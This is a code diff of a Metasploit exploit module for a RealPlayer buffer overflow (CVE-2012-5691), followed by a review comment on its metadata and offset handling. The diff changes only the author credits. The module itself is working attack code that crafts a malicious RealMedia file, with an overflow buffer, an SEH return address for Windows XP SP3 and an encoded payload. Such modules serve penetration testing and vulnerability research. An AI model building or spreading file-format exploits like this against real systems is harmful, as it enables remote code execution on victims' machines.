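--- a/PATH_NOT_SHOWN_ON_PAGE
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -1,78 +1,78 @@
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
 
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
 #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
 Rank = NormalRanking
 
 include Msf::Exploit::FILEFORMAT
 include Msf::Exploit::Seh
 
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'RealPlayer BoF 0Day',
 'Description' => %q{
 Buffer overflow with RealMedia files vulnerability
 Affected software: Windows RealPlayer 15.0.6.14 and prior.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
-'suto@vnsecurity.net trongnguyen0205@gmail.com', # Original discovery
+'suto(https://twitter.com/toanphamvan) ', # Original discovery
-'suto', # MSF Module
+'trongnguyen0205@gmail.com', # MSF Module
 ],
 'References' =>
 [
 [ 'OSVDB', '<insert OSVDB number here>' ],
 [ 'CVE', 'CVE-2012-5691' ],
 [ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ]
 ],
 'DefaultOptions' =>
 {
 'ExitFunction' => 'process', #none/process/thread/seh
 #'InitialAutoRunScript' => 'migrate -f',
 },
 'Platform' => 'win',
 'Payload' =>
 {
 'BadChars' => "\x0d", # <change if needed>
 'DisableNops' => true,
 },
 
 'Targets' =>
 [
 [ 'Windows XP SP3',
 {
 'Ret' => 0x5acd5121 ,
 'Offset' => 2312
 }
 ], # pop ebx # pop esi # ret - rpap3260.dll
 ],
 'Privileged' => false,
 #Correct Date Format: "M D Y"
 #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
 'DisclosureDate' => 'MONTH DAY YEAR',
 'DefaultTarget' => 0))
 
 register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)
 
 end
 
 def exploit
 content = "[InternetShortcut]\nURL="
 buffer = "A"*2312
 buffer << generate_seh_record(target.ret)
 buffer << make_nops(30)
 buffer << payload.encoded #522 bytes of space
 filecontent = content+buffer+"B"*5000
 file_create(filecontent)
 
 end
 end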
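Review bot: The new "Original discovery" credit on line 28 carries a trailing space inside the string literal, `'suto(https://twitter.com/toanphamvan) '`, which is emitted verbatim wherever the framework prints module authors; it should read `'suto (https://twitter.com/toanphamvan)'` or follow the usual `Name <contact>` form the MSF Module credit on the next line now uses. While touching the metadata, the template placeholders still present on lines 33 and 61 (`'<insert OSVDB number here>'` and `'DisclosureDate' => 'MONTH DAY YEAR'`) sit next to a real CVE and vendor advisory in References, so they should be filled from that advisory or dropped; a DisclosureDate that is not in the "M D Y" form the comment above it requests is likely to be rejected when the module metadata is loaded, and the "0Day" in `'Name'` is no longer accurate once a CVE is cited. Separately, `exploit` hard-codes `"A"*2312` while the target already declares `'Offset' => 2312`; reading the value from the target hash keeps the two from drifting apart if another target is added.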